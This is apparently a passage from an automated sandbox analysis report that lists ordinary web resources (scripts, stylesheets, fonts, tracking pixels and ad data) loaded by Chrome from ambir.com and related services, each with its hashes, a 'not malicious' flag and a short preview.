                                                                                                                                                                                              Preview:!function({retentionPeriodDays:e,timestamp:t,daysBeforeNotice:i,productName:n,version:s,ignorePattern:a}){if(a.some((e=>RegExp(e).test(document.currentScript.src))))return;const o=(-1*(Date.now()-t-24*e*60*60*1e3)/864e5).toFixed(2);o<=i&&o>=0?console.warn(`Warning: The version ${s} of ${n} is set to lose support in ${o} days.`):o<0&&console.error(`Error: The version ${s} of ${n} not supported anymore.`)}({retentionPeriodDays:90,productName:"accessWidget",daysBeforeNotice:14,version:"v1.19.0",timestamp:1732031714890,ignorePattern:["/^(?!.*v\\d+\\.\\d+\\.\\d+).*/"]}),(()=>{"use strict";var e={301:function(e,t,i){var n=this&&this.__values||function(e){var t="function"==typeof Symbol&&Symbol.iterator,i=t&&e[t],n=0;if(i)return i.call(e);if(e&&"number"==typeof e.length)return{next:function(){return e&&n>=e.length&&(e=void 0),{value:e&&e[n++],done:!e}}};throw new TypeError(t?"Object is not iterable.":"Symbol.iterator is not defined.")},s=this&&this.__read||function(e,t){var i="function"==type
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://us-u.openx.net/w/1.0/sd?cc=1&id=537103138&val=16b1e49ed627599a8c527b960adbb83e&gdpr=0&gdpr_consent=
                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:troff or preprocessor input, ASCII text, with very long lines (372)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):37414
                                                                                                                                                                                              Entropy (8bit):4.82325822639402
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:mmMtI+A4CSIDqvnI+YTBrFPvVrJjhiRAiiEL:mXtI+A4GDUI+Y9rpVljhiIEL
                                                                                                                                                                                              MD5:C495654869785BC3DF60216616814AD1
                                                                                                                                                                                              SHA1:0140952C64E3F2B74EF64E050F2FE86EAB6624C8
                                                                                                                                                                                              SHA-256:36E0A7E08BEE65774168528938072C536437669C1B7458AC77976EC788E4439C
                                                                                                                                                                                              SHA-512:E40F27C1D30E5AB4B3DB47C3B2373381489D50147C9623D853E5B299364FD65998F46E8E73B1E566FD79E97AA7B20354CD3C8C79F15372C147FED9C913FFB106
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/themes/ambir/css/font-awesome.css
                                                                                                                                                                                              Preview:/*!. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */./* FONT PATH. * -------------------------- */.@font-face {. font-family: 'FontAwesome';. src: url('../fonts/fontawesome-webfont.eot?v=4.7.0');. src: url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'), url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'), url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'), url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'), url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');. font-weight: normal;. font-style: normal;.}..fa {. display: inline-block;. font: normal normal normal 14px/1 FontAwesome;. font-size: inherit;. text-rendering: auto;. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;.}./* makes the font 33% larger relative to the icon container */..
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (32033)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):37045
                                                                                                                                                                                              Entropy (8bit):5.174934618594778
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:o2rGy27UwlNqMl95qNmCFejhqs8snmi+CSFXfbx8Gf3Zq7Q:Jg73zhq0GvbJ3ZKQ
                                                                                                                                                                                              MD5:5869C96CC8F19086AEE625D670D741F9
                                                                                                                                                                                              SHA1:430A443D74830FE9BE26EFCA431F448C1B3740F9
                                                                                                                                                                                              SHA-256:53964478A7C634E8DAD34ECC303DD8048D00DCE4993906DE1BACF67F663486EF
                                                                                                                                                                                              SHA-512:8B3B64A1BB2F9E329F02D4CD7479065630184EBAED942EE61A9FF9E1CE34C28C0EECB854458977815CF3704A8697FA8A5D096D2761F032B74B70D51DA3E37F45
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:/*!. * Bootstrap v3.3.7 (http://getbootstrap.com). * Copyright 2011-2016 Twitter, Inc.. * Licensed under the MIT license. */.if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1||b[0]>3)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 4")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (454)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):88667
                                                                                                                                                                                              Entropy (8bit):5.143574215088127
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:jLGc73K8d7y0lFS3FiFbFVOFiFRFZhqFWFVFdFfFfQvnHFE3FmkTz4:j3735lg3o9uI3D8s3rRhEHy3UF
                                                                                                                                                                                              MD5:D603ED592E55F07D313B63112B930FBF
                                                                                                                                                                                              SHA1:F41F85A845498B007F6C3720DBD53A159986EC09
                                                                                                                                                                                              SHA-256:B33B5EFAB0ADEB34A6559FA7163E60D0C4BA0C0CEE293BF215315717270584A5
                                                                                                                                                                                              SHA-512:0F7F93472B61A312EE31DC6110C7E4CC847027FA5FAECFB2EB4505ACF8DFCFF4B960EFABE947C0A62B92A7E491377325E0A819B31DD612B4479016CBD82ED555
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.zohocdn.com/forms/css/themes/custom.d603ed592e55f07d313b63112b930fbf.css
                                                                                                                                                                                              Preview:/* $Id: $ */.@charset "UTF-8";./* CSS Document */../*defaultTheme starts here*/...backgroundBg, .tyBackgroundBg {..background-color:#f5f5f5;.}...backgroundSecBg{ ..margin:0;..padding:0;.}...templateWidth, .tyTemplateWidth {..margin:0 auto;..width:800px;../*...Old forms have backgroundsecbg with padding:30px in custom.css . Now changed padding to templateWidth class....Old Users have form width of 800px will change to 740px because of 30px padding on left and right of form....Hence to differentiate old and new forms, .newThemeDummyWidth class is used. ...Any changes in this padding kindly find ".newThemeDummyWidth" and do needful changes...*/..padding:30px; .}..topContainer {..display:none;.}..btmContainer {..display:none;.}..centerContainer {.}..templateWrapper, .tyTemplateWrapper {..background:#fff;..border:1px solid #d6d6d6;..-webkit-border-radius:2px;..-moz-border-radius:2px;..-ms-border-radius:2px;..-o-border-radius:2px;..border-radius:2px;..position: relative;.}..tempHeadContBdr {
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (14052)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):14510
                                                                                                                                                                                              Entropy (8bit):5.077208470174998
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:s0x++beOAj/BQ5RGFhJdN10xt2v3fhN5BV9T1FOxrM9F7klAsdxxJiZDBZv0Er8U:s0x++SAS6xgj7d0ErPFGiG9E
                                                                                                                                                                                              MD5:21B3C411436805F5884CA32DB35F4FB4
                                                                                                                                                                                              SHA1:D173F4855A03A83D2BB2C62F55B33E5644A7DF65
                                                                                                                                                                                              SHA-256:4366513B2340D9ACDA4D69D3593CD66BE08EAC97EC7EC91C4173135069299046
                                                                                                                                                                                              SHA-512:2D077B020CD125B32B6C5CB37BA39EC8B8457863D2F82F1E722F7B9953E6E28D6C1B685EA2E4B61FE7E42618EA53BDCB843A565DF20D0DA55190A325AA9F3FDB
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.olark.com/a/assets/v0/site/7486-534-10-2045.js?cb=2024-11-20
                                                                                                                                                                                              Preview:. (function(){. olark.extend('CalloutBubble');.olark.extend('Feedback');.olark.extend('Sounds');.olark.extend('WelcomeAssist');... var isNewVersion = olark._ && olark._.versions && (olark._.versions.follow || olark._.versions.popout). if(isNewVersion) {. olark._.finish({"CalloutBubble":{"bubble_image_url":"","enabled":true,"slide":false},"Feedback":{"enabled":true},"Sounds":{"enabled":true},"WelcomeAssist":{"enabled":true,"notify_operator_of_new_visitors":false,"welcome_delay_in_seconds":30,"welcome_messages":["Hey there! Can we help you out?"],"welcome_new_visitors":true},"system":{"allow_change_colors":true,"allow_change_height":true,"allow_change_width":true,"allowed_domains":"*.docketport.com,*.ambir.com","append_to_body":1,"away_text":"Contact us","before_chat_text":"Chat with us","bottom_margin":0,"branding":"powered_by","branding_link_text":"Powered by Olark","branding_panel_cancel_text":"Go back","branding_panel_link_text":"Try Olark on your s
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 16180, version 1.0
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):16180
                                                                                                                                                                                              Entropy (8bit):7.986360591645025
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:Fo7MaYx9Al8jPjhjmK1Jtb0dnKpfAfe2WN+Fr44:Woai6mDjpmK1Jt5AfehUFl
                                                                                                                                                                                              MD5:43750A193B8FF0B4E929323A72D79301
                                                                                                                                                                                              SHA1:F48633DE72E52238E246CDB1920A0F1686B74701
                                                                                                                                                                                              SHA-256:8BEEC539128CEA621E511CD54F21A0D17FF891A16A0EBD7A98A3E4FBC00BD0E5
                                                                                                                                                                                              SHA-512:A184EB82598CE748EDC1D18ED3D6A2C7247CDE9C476ACD8F16A97C73652AA80FD654AB203A1D3C1890729BA9AB9878586D693F2FED5F394EA915A7F0F8BF1143
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.olark.com/jsclient/fonts/noto-sans-v11-latin-700.woff2
                                                                                                                                                                                              Preview:wOF2......?4......y4..>..........................j..D.2.`........4.....\.."..V..6.$..(. ..B. ..+..h5l.F1.. JD})...6.@..V....b..M....T...o....0*..X.........b+]....U.s.....s.z..(.;.............[c.....ij......N.....".....'..Qm.[q,.6B.8Am#........}..C._...{...QH......{`V.( ....4.n#sDmdl.F-...f.0`l...Q#%ZL$Ry..c$J.....D1.._..;..9.k5KSUKB......^..l.....Y_2..K....u.d.@J..S:6.b...fO...mZ).)[.Q?.....u...,.1..2.:?....h.4L.....;R.../.....~(x...W.s..s:..?6....M.T...t....nY...+.......!.+...L..<_.i.Jy.Z.v.=.kSq..l.6.P.SC.6..H...=^.i.U...uh....S'+.i.X......V.?)..A.(.%y#}.hd_J.P^..U......!.$..)..\.G..!.0.7.......@.v...-9l....\...*......MEY....}."....K.N....J.......B.Z}.........!b`.....T........+TU8.p..;.1W...}.]( ....r....K7.y..D....R.z.dX..E<.H@.)(".]d`.L{.~..iQB".8.f.n)..2.]....+H.`.'.g.Nd...r......yg.f..,..Am.L...]B...ws..T......9.'.Q.H.......Hm...)....*..<IDh"..c....L.....iR..5..R.7..$.7`D..;..&...E....u!...,}>.'.R..@..R.q...Z0Di..G..........a8J.K...8....P-.~.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (2530)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):277537
                                                                                                                                                                                              Entropy (8bit):5.560458810093179
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:+gYpTAX/D+ORelt0tBgDwPAjIJ8UUlPM22KiDUG7Z0DmoMfgQJUwYbD:+MX/iOReyPmPx276DmoMfgQJUH
                                                                                                                                                                                              MD5:6A48838A5DC87603ED02610A2C962A1C
                                                                                                                                                                                              SHA1:6C540F53B5D6DB286E827FF2B6BD8302DFA0C519
                                                                                                                                                                                              SHA-256:DB9A59FBB455A8A0CD5A8BF9C273BFB89AC64295460A15053F51B0E7159E8B01
                                                                                                                                                                                              SHA-512:073618068D4AA4A35E847D01953602C292D1958DA21ED0BF6C73DCA093F482BDAA1BE353C6712CFF8C70DB1E4C7CE4D38D954E75050A70F1A16A25A3866C6707
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://www.googletagmanager.com/gtm.js?id=GTM-543TWKJ
                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.purchase.actionField.order_name"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.purchase.actionField.revenue"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.currencyCode"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__e"}
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (15868)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):429069
                                                                                                                                                                                              Entropy (8bit):5.64116716562725
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:Z4wGfIMX/iOG9eRPmPL97aBJDMfgQJZyOJtx0/awG:Sw2l6QRPmR7bTL
                                                                                                                                                                                              MD5:4DD53C777C314A5C18F548B9CA26F383
                                                                                                                                                                                              SHA1:D463D981559587D056D38D825519D4256E8986F1
                                                                                                                                                                                              SHA-256:F4C2D680F7C7495688D18214C267626CD8BD706033A05A1C7066BCBF6D78C3D6
                                                                                                                                                                                              SHA-512:E66CE4B71B062540DB7E4FC51E843A5C89D8D3405CFBD281C0F10AE81A3DB865C6363573C37021A1D58DC2A368D910612D7CCC927A59090E6A149C17EF0150B0
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://www.googletagmanager.com/gtag/js?id=G-4J1BFCRRT4&l=dataLayer&cx=c&gtm=45He4bj0v833545045za200
                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":"c"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":25,"vtp_rules":["list","ambir\\-technology\\.myshopify\\.com","ambir\\.com","shop\\.ambir\\.com"],"tag_id":14},{"function":"__ogt_1p_data_v2","priority":15,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (65430)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):305392
                                                                                                                                                                                              Entropy (8bit):5.152588166724183
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:FYnnzOIIRuLMmYPXBZ2kCCEY47FV4V4jz/vGrXt25k6vlBIDgb9SGhK/EmS1OdIw:/a1tBBOKvv1dP14jQrIHLz
                                                                                                                                                                                              MD5:717C57BBABD2726CAE09DDA2681C5AA2
                                                                                                                                                                                              SHA1:97945D71A68F51739BB9B0F8D78F9EE300B05C77
                                                                                                                                                                                              SHA-256:198E7D7C0D25B38B5D7D2634A3F14BF6E558D061D23E1160F5668572B0B01254
                                                                                                                                                                                              SHA-512:2955956497AA9B6BE8DE6FA03600A7142FBF2CE1D015B553EA25430E7D6AE6AADCEE770C248660614699B6AE7B83316DD3CFA69D919518398DD5F8503321FD54
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.zohocdn.com/forms/css/formslive.717c57bbabd2726cae09dda2681c5aa2.css
                                                                                                                                                                                              Preview:/* $Id$ */./**. * IMPORTANT NOTE: This compressed css file includes Zoho Forms Live Page stylesheets. */.. /* button ---------------------------------------------- */.button {.display: inline-block;.zoom: 1; *display: inline;.vertical-align: baseline;.margin: 0 2px;.outline: none;.cursor: pointer;.text-align: center;.text-decoration: none;.padding: .5em 2em .55em;.text-shadow: 0 1px 1px rgba(0,0,0,.3);.-webkit-border-radius: .5em;.-moz-border-radius: .5em;.border-radius: .5em;.-webkit-box-shadow: 0 1px 2px rgba(0,0,0,.2);.-moz-box-shadow: 0 1px 2px rgba(0,0,0,.2);.box-shadow: 0 1px 2px rgba(0,0,0,.2);.font: 12px "Inter", 'Open Sans', "Lucida Grande", "Lucida Sans Unicode", Arial, Helvetica, sans-serif;}.button:hover {.text-decoration: none;}.button:active {.position: relative;.top: 1px;}/* color styles ---------------------------------------------- */.gray {.color: #e9e9e9;.border: solid 1px #9c9c9c;.background: #f1f1f1;.color: #222;}.red {.color: #fff;.border: solid 1px #BC0208;.bord
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (8997), with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):8997
                                                                                                                                                                                              Entropy (8bit):5.202507991071995
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:k/UWUp6D4uggCfc0AdxOAx94EaK/gVHwA0tiUR1PRXonoka8aX3:k/UtVTfbGbF/gVQAojX7X3
                                                                                                                                                                                              MD5:9144AAFB03F624B2D2180DA5B9DD0BC8
                                                                                                                                                                                              SHA1:EF8AF033DD0BF16D0D872364ADC9C0C8D3CA6014
                                                                                                                                                                                              SHA-256:B0ABEC2D9709FD039609B9A3A8108866D0F35875C0FCEF8D1DA49C586E644657
                                                                                                                                                                                              SHA-512:7A70BF7B356AF36355AB69B32D16010D9B1583C20358C5C00E2AACEF85D6915C794EF01574D7C5C2C9E9BD950743E5FCE14077D6D66F85F48203C0EAAD8B64E2
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:!function t(e,n,o){function r(a,s){if(!n[a]){if(!e[a]){var l="function"==typeof require&&require;if(!s&&l)return l(a,!0);if(i)return i(a,!0);var u=new Error("Cannot find module '"+a+"'");throw u.code="MODULE_NOT_FOUND",u}var c=n[a]={exports:{}};e[a][0].call(c.exports,function(t){var n=e[a][1][t];return r(n?n:t)},c,c.exports,t,e,n,o)}return n[a].exports}for(var i="function"==typeof require&&require,a=0;a<o.length;a++)r(o[a]);return r}({1:[function(t,e,n){(function(t){var n,o,r;r=function(t){var e;try{return t.location.origin||(e=t.location.port,t.location.origin=t.location.protocol+"//"+t.location.hostname+(null!=e?e:":"+e||"")),(null==t||!t.location.origin.match(/static\.olark\.com$/))&&(null!=t&&t.parent.document,!0)}catch(t){return!1}},o=(n=function(e){if(e=e||t.window)return r(e)&&e!==t.window.top?(null!=e?e.parent.olark:void 0)?e.parent:n(e.parent):e})(),e.exports={getOlark:function(){return null!=o?o.olark:void 0},getWindow:function(){return o},getDocument:function(){return null!=
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):26343
                                                                                                                                                                                              Entropy (8bit):5.229043680214599
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:rQ91bCntlfW3ensnF1bj06uvzhJMmysbui35:0912jzsF1/09vtJMJsbuC5
                                                                                                                                                                                              MD5:B1C4C87ADA9AB83F53620C125CBE3047
                                                                                                                                                                                              SHA1:1DCD3338BC68B5BDDA89425CEE76F5DA2314639E
                                                                                                                                                                                              SHA-256:7EFA094C25252BE99D77EF137A3F7F46D13FC0808BDF85F4C81A98C82A2E4158
                                                                                                                                                                                              SHA-512:661DF3BFF4A073C9353A86BBE20B9BC92494DBF8E6A1976035FC1EEEB47870B4EAA062D20A308B21FFAD7940CF755F34C4D8F6F89C6B828C57324C6C80D08313
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:[{"owner":"https://x.adroll.com","trustedBiddingSignalsURL":"https://x.adroll.com/kv/v1/getvalues","name":"GXXT3DJJNNBKHGBC62RAND","biddingLogicURL":"https://x.adroll.com/bid/bidding-logic.js","biddingWasmHelperURL":"https://x.adroll.com/bid/bidding-logic.wasm","updateURL":"https://x.adroll.com/update/GXXT3DJJNNBKHGBC62RAND?p=BQHT7jGoVTgKahk1C7qmZuJZAAAAAQAILntLAPz0jHzO_PSMfM4","userBiddingSignals":{"update_timestamp":1732134522,"join_timestamp":1732134522}},{"owner":"https://x.adroll.com","trustedBiddingSignalsURL":"https://x.adroll.com/kv/v1/getvalues","name":"prospecting","biddingLogicURL":"https://x.adroll.com/bid/bidding-logic.js","biddingWasmHelperURL":"https://x.adroll.com/bid/bidding-logic.wasm","trustedBiddingSignalsKeys":["pum5GX","pLNIlP","p2vdNF","pn8Jc2","pjwGuq","pYo3SL","timestamp"],"updateURL":"https://x.adroll.com/update/prospecting/GXXT3DJJNNBKHGBC62RAND?p=BQHT7jGoVTgKahk1C7qmZuJZAAAAAQAILntLAPz0jHzO_PSMfM4","ads":[{"renderURL":"https://x.adroll.com/ads/tXPC9qez6O","m
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (5844), with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):5847
                                                                                                                                                                                              Entropy (8bit):5.357257862815137
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:z+f2pTjc1rSji8ZrX+bsKGqyHkC6i0CXvU/oaKumaO1kE3wInu30KhT+RMoslvar:COlarSji8NO4KGqyECYCX8/oamaO1k4D
                                                                                                                                                                                              MD5:F5F47A2FF906D110A9F0174A7386DF2F
                                                                                                                                                                                              SHA1:C8C7A994F1C921D677233B1D8EAD8E1F36594563
                                                                                                                                                                                              SHA-256:003ED740643E18DB5B145A9B2A0F64C03B608089B6CF4E6B4E435FFC6D82BD96
                                                                                                                                                                                              SHA-512:4E18857F471F9B81AF291DC7D082401F689D16D8B721B950BCD57A54CBC82E405764E745DF904689F744DDFBD0339CC34A5A6D259101D9D418399EF68AEC2455
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: ..var _0x596311=_0xc2f2;(function(_0x2e4b0a,_0x8218b){var _0x341c59=_0xc2f2,_0x388ec9=_0x2e4b0a();while(!![]){try{var _0x32e3c5=parseInt(_0x341c59(0x202))/0x1+-parseInt(_0x341c59(0x212))/0x2+parseInt(_0x341c59(0x1fb))/0x3*(-parseInt(_0x341c59(0x218))/0x4)+parseInt(_0x341c59(0x209))/0x5+parseInt(_0x341c59(0x21b))/0x6*(parseInt(_0x341c59(0x1ef))/0x7)+-parseInt(_0x341c59(0x20c))/0x8*(-parseInt(_0x341c59(0x205))/0x9)+parseInt(_0x341c59(0x21a))/0xa*(-parseInt(_0x341c59(0x224))/0xb);if(_0x32e3c5===_0x8218b)break;else _0x388ec9['push'](_0x388ec9['shift']());}catch(_0x1dfe34){_0x388ec9['push'](_0x388ec9['shift']());}}}(_0x23f8,0x8c937));function _0xc2f2(_0x315da4,_0x3943d5){var _0x23f878=_0x23f8();return _0xc2f2=function(_0xc2f217,_0x395e46){_0xc2f217=_0xc2f217-0x1ef;var _0xea7134=_0x23f878[_0xc2f217];return _0xea7134;},_0xc2f2(_0x315da4,_0x3943d5);}function setCookie(_0xcf5859,_0x28c125,_0x412b1b){var _0x2c6db3=_0xc2f2,_0x1892e7='';if(_0x412b1b){var _0x513313=new Date();_0x513313[_0x2c6db3(0
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (4825), with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):4825
                                                                                                                                                                                              Entropy (8bit):5.792361363352052
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:1gv6vV0qSkxO9D06lUUTz9NnSzZhFt8vf1dtzlTacRq938Ca:1dCqSF9Q6RX9hq0zFRg38Z
                                                                                                                                                                                              MD5:BEAC8FED59F608B70932E4626B7C1C90
                                                                                                                                                                                              SHA1:51F5E41B7A1C0A55C9D1FA533C9EDC867B4CFE4C
                                                                                                                                                                                              SHA-256:016DBF34362C7C0F9B7D925EA8AEEEC4DBAD8BB2CBEF656099834C442F26EFED
                                                                                                                                                                                              SHA-512:093284F2D3EA23B3AAC2CB582E55F3EC832D8B843ECF3F88EF485E4D8EDE147C4E0ED9E63B867F053CCEBFBE07B817216F5FB293FF527C970A4D716BE268DDF6
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(b,a,c){if(b==Array.prototype||b==Object.prototype)return b;b[a]=c.value;return b};function k(b){b=["object"==typeof globalThis&&globalThis,b,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var a=0;a<b.length;++a){var c=b[a];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} var m=k(this),n=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",q={},t={};function u(b,a,c){if(!c||b!=null){c=t[a];if(c==null)return b[a];c=b[c];return c!==void 0?c:b[a]}} function v(b,a,c){if(a)a:{var d=b.split(".");b=d.length===1;var e=d[0],g;!b&&e in q?g=q:g=m;for(e=0;e<d.length-1;e++){var f=d[e];if(!(f in g))break a;g=g[f]}d=d[d.length-1];c=n&&c==="es6"?g[d]:null;a=a(c);a!=null&&(b?h(q,d,{configurable:!0,writable:!0,value:a}):a!==c&&(t[d]===void 0&&(b=Math.random()*1E9>>>0,t[d]=n?m.Symbol(d):"$jscp$"+b+"$"+d),h(g,t[d],{co
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (56581), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):56581
                                                                                                                                                                                              Entropy (8bit):5.194818277599849
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:36xg4ZL4w5PTuQQRzvL62iCkyYGPx9c5nq:qxg4cxoq
                                                                                                                                                                                              MD5:63028EB07F29700A82B544C85AAABF44
                                                                                                                                                                                              SHA1:EA3F3AD67D0D82F08B4048493832F40075DB1FCB
